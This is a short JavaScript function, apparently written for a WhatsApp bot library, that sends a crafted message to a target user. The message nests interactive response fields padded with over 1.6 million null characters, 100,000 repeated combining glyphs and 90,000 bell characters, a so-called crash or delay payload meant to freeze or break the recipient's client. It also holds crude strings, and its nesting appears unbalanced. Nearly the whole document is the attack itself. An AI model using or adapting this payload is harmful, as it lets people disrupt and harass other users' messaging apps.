async function DelayMakluAnjg(sock, target) {
  await sock.relayMessage(target, {
    groupStatusMessageV2: {
      message: {
        interactiveResponseMessage: {
          body: {
            text: "YatimXxXcrotX",
            format: "DEFAULT"
          },
          nativeFlowResponseMessage: {
            name: "address_message",
            paramsJson: {"values":{"in_pin_code":"xxx","building_name":"xxx","landmark_area":"X","address":"xxx","tower_number":"maklo","city":"porno","name":"crb","phone_number":"xxx","house_number":"xxx","floor_number":"xxx","state":"yandex | ${"\u0000".repeat(1645000)}"}},
            version: 3
          },
          contextInfo: {
            quotedMessage: {
              viewOnceMessage: {
                message: {
                  interactiveResponseMessage: {
                    body: {
                      text: "⏤͟͟͞͞𝗞𝗶𝗺𝗶𝗫𝗫𝟳 ⩇⩇:⩇⩇" + "ꦾ".repeat(50000) + "ꦽ".repeat(50000),
                      format: "DEFAULT" 
                    },
                    nativeFlowResponseMessage: {
                      name: "call_permission_request",
                      paramsJson: "\u0007".repeat(90000),
                      version: 3
              }
            }
          }
        }
      }
    }
  }, { participant: { jid: target }});
}
